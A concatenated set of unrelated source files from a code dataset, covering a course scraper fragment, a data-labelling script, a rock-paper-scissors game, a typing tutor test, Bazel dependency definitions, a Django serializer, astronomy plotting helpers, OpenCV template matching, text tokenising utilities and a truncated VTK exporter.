data['Title'].append(term_df['Title'][idx])\n num_rows = len(data['Course Code'])\n gs_data = {key: ([None] * num_rows if lst == [] else lst) for key, lst in 
data.items()}\n courses_df = pd.DataFrame(data=gs_data, columns=cfg.GENERAL.WKS_COLUMNS['Course Archive'])\n return courses_df\n\n\n\n\n def run(self, *args, **kwargs):\n\n\n raise NotImplementedError\n\n\n\n","sub_path":"code/WEBSCRAPER PYTHON/core/gs_parent.py","file_name":"gs_parent.py","file_ext":"py","file_size_in_byte":13238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650367409","text":"import xml.etree.ElementTree as ET\nfrom csv import DictWriter\n\nfrom utils.data_helper import get_words_only\n\ndata = ET.parse('data/full.xml')\nlabelling_file_path = 'data/document_id.csv'\n\nlabelling_file = open(labelling_file_path, 'w')\nlabelling_csv = DictWriter(labelling_file, fieldnames=['sentence_id', 'text', 'document_id'])\nlabelling_csv.writeheader()\n\nroot = data.getroot()\n\nfor sentence in root:\n text = ' '.join([get_words_only(phrase.text) for phrase in sentence])\n labelling_csv.writerow({'sentence_id': sentence.attrib['id'], 'text': text, 'document_id': ''})\n\nlabelling_file.close()\n","sub_path":"prepare_data_for_document_id_labelling.py","file_name":"prepare_data_for_document_id_labelling.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"512653664","text":"def name_to_number(name):\n\n \n \n if (name=='rock'):\n choice_val = 0;\n elif (name=='Spock'):\n choice_val = 1;\n elif (name=='paper'):\n choice_val = 2\n elif (name=='lizard'):\n choice_val = 3\n elif (name=='scissors'):\n choice_val = 4 \n else: \n choice_val = \"\"\n \n return choice_val \n \n\ndef number_to_name(number):\n if (number<=4): \n if (number==0):\n choice_val = 'rock'\n elif (number==1):\n choice_val = 'Spock'\n elif (number==2):\n choice_val = 'paper'\n elif (number==3):\n choice_val = 'lizard'\n elif (number==4):\n choice_val = 'scissors' \n else: \n choice_val = \"\"\n \n return choice_val \n \n else:\n return \"\"\n \n \n \n \n \ndef rpsls():\n import random \n comp_number = random.randrange(0,4) \n player_number = random.randrange(0,4)\n\n \n\n print (\"Player chooses \",number_to_name(player_number),\" \")\n print (\"Computer chooses \",number_to_name(comp_number),\"\")\n\n\n if (comp_number>player_number):\n print (\"Computer wins!\\n\")\n elif(comp_number.\n\nimport unittest\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nTEST_USERNAME = \"_modeltest\"\n\nclass TestCase(unittest.TestCase):\n\t@property\n\tdef models(self):\n\t\treturn [m.model for m in self._mm.mods(\"active\", type=\"typingTutorModel\")]\n\n\tdef setUp(self):\n\t\tfor m in self.models:\n\t\t\tm.registerUser(TEST_USERNAME)\n\n\tdef tearDown(self):\n\t\tfor m in self.models:\n\t\t\tm.deregisterUser(TEST_USERNAME)\n\n\tdef testRegisterUnregisterErrors(self):\n\t\tfor m in self.models:\n\t\t\twith self.assertRaises(m.UsernameEmptyError):\n\t\t\t\tm.registerUser(\"\")\n\t\t\twith self.assertRaises(m.UsernameTakenError):\n\t\t\t\tm.registerUser(TEST_USERNAME, \"COLEMAK_LAYOUT\")\n\t\t\tm.deregisterUser(TEST_USERNAME)\n\t\t\twith self.assertRaises(KeyError):\n\t\t\t\tm.deregisterUser(TEST_USERNAME)\n\t\t\t#for tearDown\n\t\t\tm.registerUser(TEST_USERNAME)\n\n\tdef testUsernames(self):\n\t\tfor m in self.models:\n\t\t\tself.assertIn(TEST_USERNAME, m.usernames)\n\n\tdef _constructArgsForSession(self):\n\t\targList = [\n\t\t\tNone,\n\t\t\t(TEST_USERNAME, 20, 0),\n\t\t\t(TEST_USERNAME, 10, 3),\n\t\t\t(TEST_USERNAME, 30, 2),\n\t\t\tNone,\n\t\t\t(TEST_USERNAME, 10, 
0),\n\t\t]\n\t\tfor i in range(50):\n\t\t\targList.append((TEST_USERNAME, 10, 0))\n\t\targList.append(None)\n\t\targList.append((TEST_USERNAME, 5, 3))\n\t\targList.append(None)\n\t\tfor i in range(10):\n\t\t\targList.append((TEST_USERNAME, 5, 0))\n\t\treturn argList\n\n\tdef _examineAmountOfMistakes(self, model, iteration):\n\t\t#the first iteration, no test results are known yet.\n\t\tif iteration == 0:\n\t\t\twith self.assertRaises(IndexError):\n\t\t\t\tmodel.amountOfMistakes(TEST_USERNAME)\n\t\telse:\n\t\t\tself.assertIsInstance(model.amountOfMistakes(TEST_USERNAME), int)\n\n\tdef _examineInstruction(self, model):\n\t\tinstruction = model.currentInstruction(TEST_USERNAME)\n\t\tlogger.debug(\"INSTRUCTION: \" + instruction)\n\t\tself.assertIsInstance(instruction, basestring)\n\t\tself.assertTrue(instruction)\n\n\tdef _examineExercise(self, model):\n\t\texercise = model.currentExercise(TEST_USERNAME)\n\t\tlogger.debug(\"NEW EXERCISE: \" + exercise)\n\t\tself.assertIsInstance(exercise, basestring)\n\t\tself.assertTrue(exercise)\n\n\tdef _examineLayout(self, model):\n\t\tself.assertEqual(model.layout(TEST_USERNAME), model.QWERTY_LAYOUT)\n\n\tdef _examineLevel(self, model):\n\t\tlevel = model.level(TEST_USERNAME)\n\t\tlogger.debug(\"LEVEL: %s\", level)\n\t\tself.assertIsInstance(level, int)\n\t\tself.assertTrue(level >= 0)\n\n\tdef _examineMaxLevel(self, model):\n\t\tmaxLevel = model.maxLevel(TEST_USERNAME)\n\t\tself.assertIsInstance(maxLevel, int)\n\t\tself.assertTrue(maxLevel >= 0)\n\n\tdef _examineSpeed(self, model, iteration):\n\t\tif iteration == 0:\n\t\t\twith self.assertRaises(IndexError):\n\t\t\t\tmodel.speed(TEST_USERNAME)\n\t\telse:\n\t\t\tspeed = model.speed(TEST_USERNAME)\n\t\t\tlogger.debug(\"SPEED PREVIOUS EXERCISE: %s wpm\", speed)\n\t\t\tself.assertIsInstance(speed, int)\n\t\t\tself.assertTrue(speed >= 0)\n\n\tdef _examineTargetSpeed(self, model):\n\t\ttargetSpeed = model.targetSpeed(TEST_USERNAME)\n\t\tself.assertIsInstance(targetSpeed, int)\n\t\tself.assertTrue(targetSpeed >= 0)\n\n\tdef testSession(self):\n\t\t\"\"\"This test has some lines commented out which can be very\n\t\t useful while debugging.\n\n\t\t\"\"\"\n\t\targList = self._constructArgsForSession()\n\n\t\tfor model in self.models:\n\t\t\tfor iteration, args in enumerate(argList):\n\t\t\t\tif args:\n\t\t\t\t\tmodel.setResult(*args)\n\n\t\t\t\tself._examineAmountOfMistakes(model, iteration)\n\t\t\t\tself._examineInstruction(model)\n\t\t\t\tself._examineExercise(model)\n\t\t\t\tself._examineLayout(model)\n\t\t\t\tself._examineLevel(model)\n\t\t\t\tself._examineMaxLevel(model)\n\t\t\t\tself._examineSpeed(model, iteration)\n\t\t\t\tself._examineTargetSpeed(model)\n\n\t\t\t\tlogger.debug(\"\")\n\nclass TestModule(object):\n\tdef __init__(self, moduleManager, *args, **kwargs):\n\t\tsuper(TestModule, self).__init__(*args, **kwargs)\n\t\tself._mm = moduleManager\n\n\t\tself.type = \"test\"\n\t\tself.requires = (\n\t\t\tself._mm.mods(type=\"typingTutorModel\"),\n\t\t)\n\n\tdef enable(self):\n\t\tself.TestCase = TestCase\n\t\tself.TestCase._mm = self._mm\n\t\tself.active = True\n\n\tdef disable(self):\n\t\tself.active = False\n\t\tdel self.TestCase\n\ndef init(moduleManager):\n\treturn TestModule(moduleManager)\n","sub_path":"modules/org/openteacher/logic/interfaces/typingTutorModelTest/typingTutorModelTest.py","file_name":"typingTutorModelTest.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293704640","text":"# 
buildifier: disable=module-docstring\nload(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\")\nload(\"@bazel_tools//tools/build_defs/repo:utils.bzl\", \"maybe\")\n\ndef repositories():\n \"\"\"Load all repositories needed for the targets of rules_foreign_cc_examples\"\"\"\n\n maybe(\n http_archive,\n name = \"rules_cc\",\n strip_prefix = \"rules_cc-b1c40e1de81913a3c40e5948f78719c28152486d\",\n url = \"https://github.com/bazelbuild/rules_cc/archive/b1c40e1de81913a3c40e5948f78719c28152486d.zip\",\n sha256 = \"d0c573b94a6ef20ef6ff20154a23d0efcb409fb0e1ff0979cec318dfe42f0cdd\",\n type = \"zip\",\n )\n\n maybe(\n http_archive,\n name = \"rules_android\",\n urls = [\"https://github.com/bazelbuild/rules_android/archive/v0.1.1.zip\"],\n sha256 = \"cd06d15dd8bb59926e4d65f9003bfc20f9da4b2519985c27e190cddc8b7a7806\",\n strip_prefix = \"rules_android-0.1.1\",\n )\n\n RULES_JVM_EXTERNAL_TAG = \"4.0\"\n RULES_JVM_EXTERNAL_SHA = \"31701ad93dbfe544d597dbe62c9a1fdd76d81d8a9150c2bf1ecf928ecdf97169\"\n\n maybe(\n http_archive,\n name = \"rules_jvm_external\",\n strip_prefix = \"rules_jvm_external-%s\" % RULES_JVM_EXTERNAL_TAG,\n sha256 = RULES_JVM_EXTERNAL_SHA,\n url = \"https://github.com/bazelbuild/rules_jvm_external/archive/%s.zip\" % RULES_JVM_EXTERNAL_TAG,\n )\n\n maybe(\n http_archive,\n name = \"cmake_hello_world_variant_src\",\n build_file_content = \"\"\"filegroup(name = \"all\", srcs = glob([\"**\"]), visibility = [\"//visibility:public\"])\"\"\",\n strip_prefix = \"cmake-hello-world-master\",\n urls = [\n \"https://mirror.bazel.build/github.com/jameskbride/cmake-hello-world/archive/master.zip\",\n \"https://github.com/jameskbride/cmake-hello-world/archive/master.zip\",\n ],\n sha256 = \"d613cf222bbb05b8cff7a1c03c37345ed33744a4ebaf3a8bfd5f56a76e25ca08\",\n )\n","sub_path":"examples/deps/repositories.bzl","file_name":"repositories.bzl","file_ext":"bzl","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"117223949","text":"from rest_framework import serializers\nfrom .models import Topping, Pizza\n\nclass ToppingSerializer(serializers.ModelSerializer):\n class Meta:\n model = Topping\n fields = '__all__'\n\nclass PizzaSerializer(serializers.ModelSerializer):\n # pizza_toppings = ToppingSerializer(many=True, required=False)\n class Meta:\n model = Pizza\n fields = '__all__'","sub_path":"shop/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"526038434","text":"\"\"\"$Id: mapmaking_plots.py\n$auth: Martin Gamboa & Jean-Christophe Hamilton & James Murphy\n$created: Fri 11 Feb 2022\n\nInspired and using the methods created by Jean-Christophe and James Murphy \n\t\tto do map-making with real data + demodulated scripts done by James. \n \nThis file contains functions to make consistency plots to check all is working well \n\n\"\"\"\n\nimport os\nimport sys \n\nimport numpy as np\nimport matplotlib.pyplot as plt \nfrom astropy.io import fits as pyfits\n\nimport scipy.ndimage.filters as f\nimport qubic.sb_fitting as sbfit\nimport qubic.demodulation_lib as dl\n\ndef plot_scan(time_axis, t_src, data_src, az, el):\n\t\"\"\"\n\tPlot the scan in azimuth and elevation. 
Data + Calibration source\n\t\"\"\"\n\n\tplt.rc('figure',figsize = (12,12))\n\n\ttinit = time_axis[0]\n\n\tplt.subplot(2,2,1)\n\tplt.plot((time_axis - tinit)/3600, az,',')\n\tplt.xlabel('Time [h]')\n\tplt.ylabel('Az')\n\tplt.subplot(2,2,2)\n\tplt.plot((time_axis - tinit)/3600, el,',')\n\tplt.xlabel('Time [h]')\n\tplt.ylabel('El')\n\tplt.ylim(30,70)\n\n\tplt.subplot(2,2,3)\n\tplt.plot(az * np.cos(np.radians(el)), el,',')\n\tplt.xlabel('Az')\n\tplt.ylabel('El')\n\n\tplt.subplot(2,2,4)\n\tplt.plot((t_src - tinit)/3600, data_src,',')\n\tplt.xlabel('Time [h]')\n\tplt.ylabel('Src Data')\n\n\n\treturn\n\ndef plot_raw_data(tod_time, tod_data, calsrc_time, calsrc_data,\n\tTESNum = None, asic = None):\n\n\t\"\"\"\n\tPlot calibration source and raw data in hours\n\t\"\"\"\n\tplt.plot(calsrc_time / 3600, dl.renorm(calsrc_data), \n\t\tlabel='Calsource', color='tab:orange')\n\tplt.plot(tod_time / 3600, dl.renorm(tod_data), \n label = 'Data TES {} ASIC {}'.format(TESNum,asic), \n color = 'tab:blue')\n\tplt.xlabel('Unix Epoch (s)')\n\n\tplt.legend(loc = 'upper left')\n\n\tplt.show()\n\n\treturn\n\ndef plot_data_and_src(tod_time, tod_data, tod_data_filtered,\n\tcalsrc_time, calsrc_data, **kwargs_plot):#ylim = [-5,5]):\n\t\"\"\"\n\tPlot calibration source, raw and filtered data\n\t\"\"\"\n\n\tplt.figure(figsize = (16,8))\n\tplt.plot(calsrc_time, (calsrc_data - np.mean(calsrc_data)) / np.std(calsrc_data), \n\t color = 'tab:orange', label = 'Calibration Source', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data_filtered - np.mean(tod_data_filtered)) / np.std(tod_data_filtered), \n\t color = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data)) / np.std(tod_data), \n\t label = 'Raw Data', color = 'tab:blue', alpha = 0.99)\n\tplt.xlabel('Unix Epoch (s)')\n\t\n\t#plt.xlim(kwargs_plot[\"xmin\"], kwargs_plot[\"xmax\"])\n\t#plt.ylim(kwargs_plot[\"ymin\"], kwargs_plot[\"ymax\"])\n\tplt.ylim(-5,5)\n\tplt.legend()\n\n\treturn\n\n\n\ndef plot_spectra_comparisson(frequency_raw, spectra_raw, frequency_filtered, spectra_filtered,\n\tperiod, lowcut, highcut, notch, nharm = 10,\n\tTESNum = None, asic = None,\n\txlim = [0.01, 90], \n\tylim = [1e1, 1e17]):\n\t\"\"\"\n\tThis method compare raw spectra vs filtered spectra\n\t\"\"\"\n\n\tplt.rc('figure', figsize = (13,8))\n\n\t#xmin, xmax, ymin, ymax = 0.01, 90, 1e1, 1e17\n\n\t############ Power spectrum\n\tplt.plot(frequency_raw, f.gaussian_filter1d(spectra_raw, 1), \n\t label = 'Raw Data')\n\tplt.yscale('log')\n\tplt.xscale('log')\n\tplt.xlabel('Frequency [Hz]')\n\tplt.ylabel('Power Spectrum')\n\tplt.xlim(xlim[0], xlim[1])\n\tplt.ylim(ylim[0], ylim[1])\n\tplt.title('TES {} ASIC {}'.format(TESNum, asic))\n\n\tfor i in range(10):\n\t plt.plot([1. / period * i, 1. 
/ period * i], [ylim[0], ylim[1]],\n\t 'k--', alpha = 0.3)\n\n\tplt.plot([lowcut, lowcut], [ylim[0], ylim[1]], 'k')\n\tplt.plot([highcut, highcut], [ylim[0], ylim[1]], 'k')\n\tplt.legend()\n\n\t########## New Power spectrum\n\tplt.plot(frequency_filtered, f.gaussian_filter1d(spectra_filtered, 1), label = 'Filtered data')\n\tfor i in range(nharm):\n\t plt.plot([notch[0,0] * (i + 1), notch[0,0] * (i + 1)], \n\t [ylim[0], ylim[1]], 'm:')\n\t \n\tplt.legend(loc = 'upper left')\n\n\tplt.tight_layout()\n\n\tplt.show()\n\n\treturn\n\ndef plot_synchronizated_data(tod_time, src_time, tod_data, src_data):\n\t\"\"\"\n\n\t\"\"\"\n\n\t#make some start and endpoints for plotting\n\tendpt2 = max(tod_time) + 2\n\tendpt1 = max(tod_time) - 3\n\tstartp1 = min(tod_time) - 1\n\tstartp2 = min(tod_time) + 4\n\n\tplt.figure(figsize = (16,12))\n\t#zoom on signal\n\tplt.subplot(2,2,3)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data))/np.std(tod_data),\n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(1.596100115e+09, 1.596100125e+09)\n\tplt.legend(loc = 'lower right')\n\t#zoom on signal\n\tplt.subplot(2,2,4)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data-np.mean(tod_data))/np.std(tod_data), \n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(1.59611721e+09, 1.59611722e+09)\n\tplt.legend(loc = 'lower right')\n\t#start point\n\tplt.figure(figsize = (16,6))\n\tplt.subplot(1,2,1)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data))/np.std(tod_data), \n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(startp1, startp2)\n\tplt.legend(loc = 'lower right')\n\t#endpoint\n\tplt.subplot(1,2,2)\n\tplt.plot(src_time, (src_data - np.mean(src_data))/np.std(src_data), \n\t\t\t\tcolor = 'tab:orange', label = 'Measured Source Signal', alpha = 0.5)\n\tplt.plot(tod_time, (tod_data - np.mean(tod_data))/np.std(tod_data),\n\t\t\t\tcolor = 'tab:green', label = 'Filtered Data', alpha = 0.5)\n\tplt.ylim(-5,5)\n\tplt.xlim(endpt1, endpt2)\n\tplt.legend(loc = 'lower right')\n\n\treturn","sub_path":"qubic/scripts/Calibration/Point_source_reconstruction/mapmaking_plots.py","file_name":"mapmaking_plots.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"618823677","text":"# template_matching.py\r\n\r\nimport cv2\r\nimport imutils\r\nimport numpy as np\r\n\r\n\r\nclass TemplateMatching:\r\n\r\n def __init__(self, plate_image, template):\r\n self.plate_image = plate_image.copy()\r\n self.template = template\r\n self.gray_plate_img = cv2.cvtColor(plate_image, cv2.COLOR_BGR2GRAY)\r\n self.info = None\r\n self.drew_img = None\r\n\r\n\r\n def find_position(self):\r\n # template will be single or double\r\n template_gray = cv2.cvtColor(self.template, cv2.COLOR_BGR2GRAY)\r\n template_canny = cv2.Canny(template_gray, 50, 200)\r\n (tH, tW) = template_canny.shape[:2]\r\n gray = self.gray_plate_img\r\n info = None\r\n\r\n # loop over the scales of the image ( multiply 2 ~ 0.1 on plate 
image)\r\n for scale in np.linspace(0.1, 2.0, 50)[::-1] :\r\n\r\n # resize the image according to the scale, and keep track\r\n # of the ratio of the resizing\r\n resized = imutils.resize(gray, width=int(gray.shape[1] * scale))\r\n r = gray.shape[1] / float(resized.shape[1])\r\n\r\n # if the resized image is smaller than the template, then break\r\n # from the loop\r\n if resized.shape[0] < tH or resized.shape[1] < tW:\r\n break\r\n \r\n # detect edges in the resized, grayscale image and apply template\r\n # matching to find the template in the image\r\n edged = cv2.Canny(resized, 50, 200)\r\n result = cv2.matchTemplate(edged, template_canny, cv2.TM_CCOEFF)\r\n (_, maxVal, _, maxLoc) = cv2.minMaxLoc(result)\r\n\r\n # if we have found a new maximum correlation value, then update\r\n # the bookkeeping variable\r\n if info is None or maxVal > info[0]:\r\n info = (maxVal, maxLoc, r, scale, tW, tH)\r\n\r\n self.info = info\r\n return info\r\n\r\n def get_start_pos(self):\r\n _, maxLoc, r, _, tW, tH = self.info\r\n return ( int(maxLoc[0] * r) ), ( int(maxLoc[1] * r) )\r\n\r\n def get_end_pos(self):\r\n _, maxLoc, r, _, tW, tH = self.info\r\n return ( int((maxLoc[0] + tW) * r) , int((maxLoc[1] + tH) * r))\r\n\r\n\r\n def draw_rectangle(self, image=None, rectangle_color=(0, 0, 255), thickness=2):\r\n if image is None:\r\n image = self.plate_image\r\n \r\n _, maxLoc, r, scale, tW, tH = self.info\r\n\r\n (startX, startY) = self.get_start_pos()\r\n (endX, endY) = self.get_end_pos()\r\n\r\n self.drew_img = cv2.rectangle(image,(startX, startY), (endX,endY), rectangle_color, thickness )\r\n return self.drew_img\r\n","sub_path":"template_matching.py","file_name":"template_matching.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"237113589","text":"import regex as re\nimport textacy\nimport unicodedata\n\nimport nltk\nfrom nltk import word_tokenize\n\nnltk.download('punkt')\n\nDEFAULT_REGEX_PATTERN = r'\\p{L}[\\p{L}\\p{P}]+\\p{L}'\nNOT_USABLE_UNICODE_CATEGORY = ['C', 'M', 'Z']\n\n\ndef unpack(text):\n ## https://en.wikipedia.org/wiki/Wikipedia:List_of_English_contractions\n\n # 's\n text = re.sub(r\"(\\b)([Ee]veryone|[Hh]e|[Hh]ow|[Ii]t|[Ss]he|[Ss]ombody|[Ss]omeone|[Ss]omebody|[Ss]omething|[Tt]hat|[Tt]here|[Tt]his|[Ww]hat|[Ww]hen|[Ww]here|[Ww]hich|[Ww]ho|[Ww]hy)'s\", r\"\\1\\2 is\", text)\n\n # 't\n text = re.sub(r\"(\\b)([Aa]re|[Cc]a|[Cc]ould|[Dd]are|[Dd]id|[Dd]oes|[Dd]o|[Hh]ad|[Hh]as|[Hh]ave|[Ii]s|[Mm]ay|[Mm]ight|[Mm]ust|[Nn]eed|[Oo]ught|[Ss]hould|[Ww]as|[Ww]ere|[Ww]ould)n't\", r\"\\1\\2 not\", text)\n\n # 'll\n text = re.sub(r\"(\\b)([Hh]e|[Hh]ow|[Ii]|[Ii]t|[Ss]he|[Tt]hat|[Tt]here|[Tt]hey|[Ww]e|[Ww]hat|[Ww]ho|[Yy]ou)'ll\", r\"\\1\\2 will\", text)\n\n # 'd\n text = re.sub(r\"(\\b)([Hh]e|[Hh]ow|[Ii]|[Ii]t|[Ss]he|[Tt]hat|[Tt]here|[Tt]hey|[Ww]e|[Ww]hat|[Ww]here|[Ww]ho|[Ww]hy|[Yy]ou)'d\", r\"\\1\\2 would\", text)\n\n # 've\n text = re.sub(r\"(\\b)([Cc]ould|[Hh]e|[Ii]|[Mm]ay|[Mm]ight|[Mm]ust|[Ss]hould|[Tt]hey|[Ww]e|[Ww]hat|[Ww]here|[Ww]ho|[Ww]ould|[Yy]ou)'ve\", r\"\\1\\2 have\", text)\n\n # 're\n text = re.sub(r\"(\\b)([Hh]ow|[Tt]hat|[Tt]here|[Tt]hese|[Tt]hey|[Tt]hose|[Ww]e|[Ww]hat|[Ww]here|[Ww]ho|[Ww]hy|[Yy]ou)'re\", r\"\\1\\2 are\", text)\n\n ### custom\n text = re.sub(r\"(\\b)(ain)'t\", r\"\\1am not\", text)\n text = re.sub(r\"(\\b)([Nn]e|[Ee]|[Oo])'er\", r\"\\1\\2ver\", text)\n text = re.sub(r\"(\\b)whomst'd've'nt\", r\"\\1who would have not\", text)\n text = re.sub(r\"(\\b)finna(\\b)\", r\"\\1fixing 
to\\2\", text)\n text = re.sub(r\"(\\b)gonna(\\b)\", r\"\\1going to\\2\", text)\n text = re.sub(r\"(\\b)cannot(\\b)\", r\"\\1can not\\2\", text)\n text = re.sub(r\"(\\b)gotta(\\b)\", r\"\\1got to\\2\", text)\n text = re.sub(r\"(\\b)y'all(\\b)\", r\"\\1you all\\2\", text)\n text = re.sub(r\"(\\b)(daresn't|dasn't)(\\b)\", r\"\\1dare not\\3\", text)\n text = re.sub(r\"(\\b)ma'am(\\b)\", r\"\\1mama\\2\", text)\n text = re.sub(r\"(\\b)gimme(\\b)\", r\"\\1give me\\2\", text)\n text = re.sub(r\"(\\b)(o'clock|oclock)(\\b)\", r\"\\1of the clock\\2\", text)\n\n text = re.sub(r\"(\\b)([Ii])'m'a\", r\"\\1\\2 am about to\", text)\n text = re.sub(r\"(\\b)([Ii])'m'o\", r\"\\1\\2 am going to\", text)\n text = re.sub(r\"(\\b)([Ii])'m\", r\"\\1\\2 am\", text)\n\n text = re.sub(r\"(\\b)([Ll]et)'s\", r\"\\1\\2 us\", text)\n text = re.sub(r\"(\\b)([Ww])on't\", r\"\\1\\2ill not\", text)\n text = re.sub(r\"(\\b)([Ss])han't\", r\"\\1\\2hall not\", text) \n\n text = re.sub(r\"(\\b)(ol)'(\\b)\", r\"\\1old\\3\", text)\n text = re.sub(r\"(\\b)'(tis)(\\b)\", r\"\\1it is\\3\", text)\n text = re.sub(r\"(\\b)'(twas)(\\b)\", r\"\\1it was\\3\", text)\n\n return text\n\ndef text_to_tokens(text):\n \n def can_use(tk):\n if len(tk) == 1:\n return False\n return True\n\n text = (text.encode('ascii', 'ignore')).decode('utf-8').lower()\n text = textacy.preprocess.replace_urls(text, ' ')\n\n blow_out_characters = [ '*', '(', ')', '...', '..', '[deleted]' ]\n for character in blow_out_characters:\n text = text.replace(character, ' ')\n\n text = unpack(text)\n\n ## split using word_tokenize,\n tokens = word_tokenize(text)\n slim_text = \" \".join(tokens)\n slim_tokens = re.findall(DEFAULT_REGEX_PATTERN, slim_text)\n slim_tokens = [ \n \"\".join([ ti for ti in term if unicodedata.category(ti)[0] not in NOT_USABLE_UNICODE_CATEGORY ]) for term in slim_tokens \n ]\n\n return slim_tokens","sub_path":"src/reddit/text_helpers.py","file_name":"text_helpers.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"366662294","text":"import numpy as np\nimport os\nimport model\nimport glob\ndef enveloppeVTK(filename,model,*args):\n\t'''\n\tvtk export\n\tfunction exportVTK(filename,model)\n\tcreates a directory with the vtk files for displays in paraview\n\t(only work for triangle and wedges based on their number of nodes)\n\t\n\tGive only the results for nw but could be extended to geometry, mask... 
\n\t\n\tinput:\n\t\tfilename    destination (string)\n\t\tmodel       this is md\n\tBy default only the results are exported; you can add whichever\n\tfield you need as a string:\n\tadd 'geometry' to export md.geometry\n\n\tBasile de Fleurian:\n\t'''\n\tDir=os.path.basename(filename)\n\tPath=filename[:-len(Dir)]\n\n\tif os.path.exists(filename):\n\t\tprint ('File {} already exists'.format(filename))\n\t\tnewname=raw_input('Give a new name or \"delete\" to replace: ')\n\t\tif newname=='delete':\n\t\t\tfilelist = glob.glob(filename+'/*')\n\t\t\tfor oldfile in filelist:\n\t\t\t\tos.remove(oldfile)\n\t\telse:\n\t\t\tprint ('New file name is {}'.format(newname))\n\t\t\tfilename=newname\n\t\t\tos.mkdir(filename)\n\telse:\n\t\tos.mkdir(filename)\n\n\tIsEnveloppe=np.where(model.mesh.vertexonbase | model.mesh.vertexonsurface)\n\t#get the element related variables\n\tif 'z' in dict.keys(model.mesh.__dict__):\n\t\tpoints=np.column_stack((model.mesh.x,model.mesh.y,model.mesh.z))\n\t\tnum_of_elt=np.size(np.isnan(model.mesh.lowerelements))+np.size(np.isnan(model.mesh.upperelements))\n\t\tlow_elt_num=np.size(np.isnan(model.mesh.lowerelements))\n\t\ttop_elt_num=np.size(np.isnan(model.mesh.upperelements))\n\telse:\n\t\tpoints=np.column_stack((model.mesh.x,model.mesh.y,np.zeros(np.shape(model.mesh.x))))\n\t\tnum_of_elt=np.shape(model.mesh.elements)[0]\n\t\t\n\tnum_of_points=np.shape(points)[0]\n\tdim=np.shape(points)[1]\n\tpoint_per_elt=np.shape(model.mesh.elements)[1]\n\t\t\n\tcelltype=5 #triangles\n\t\n\t#this is the result structure\n\tres_struct=model.results\n\tif (len(res_struct.__dict__)>0):\n\t\t#Getting all the solutions of the model\n\t\tsolnames=(dict.keys(res_struct.__dict__))\n\t\tnum_of_sols=len(solnames)\n\t\tnum_of_timesteps=1\n\t\t#%building solutionstructure \n\t\tfor solution in solnames:\n\t\t\t#looking for multiple time steps\n\t\t\tif (np.size(res_struct.__dict__[solution])>num_of_timesteps):\n\t\t\t\tnum_of_timesteps=np.size(res_struct.__dict__[solution])\n\t\t\t\tnum_of_timesteps=int(num_of_timesteps)+1\n\telse:\n\t\tnum_of_timesteps=1\n\n\tfor step in range(0,num_of_timesteps):\n\t\ttimestep=step\n\t\tfid=open((filename +'/Timestep.vtk'+str(timestep)+'.vtk'),'w+')\n\t\tfid.write('# vtk DataFile Version 2.0 \\n')\n\t\tfid.write('Data for run %s \\n' % model.miscellaneous.name)\n\t\tfid.write('ASCII \\n')\n\t\tfid.write('DATASET UNSTRUCTURED_GRID \\n')\n\t\tfid.write('POINTS %d float\\n' % num_of_points)\n\t\tfor point in points:\n\t\t\tfid.write('%f %f %f \\n'%(point[0], point[1], point[2]))\n\t\t\t\n\t\tfid.write('CELLS %d %d\\n' %(num_of_elt, num_of_elt*(point_per_elt+1)))\n\n\t\t# \tif exist('low_elt_num')\n\t\t# triaconnect=zeros(num_of_elt,3);\n\t\t# triaconnect(1:low_elt_num,:)=model.mesh.elements(find(isnan(model.mesh.lowerelements)),1:3);\n\t\t# upshift=-min(min(model.mesh.elements(find(isnan(model.mesh.upperelements)),4:6)))+1+max(max(model.mesh.elements(find(isnan(model.mesh.lowerelements)),1:3)));\n\t\t# triaconnect(1+low_elt_num:num_of_elt,:)=model.mesh.elements(find(isnan(model.mesh.upperelements)),4:6)+upshift;\n\t\t# fprintf(fid,s,[(3)*ones(num_of_elt,1) triaconnect-1]');\n
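\t\t# Connectivity: one '3 i j k' line per triangle element, zero-based indices.\n\t\tfor elt in range(0, 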
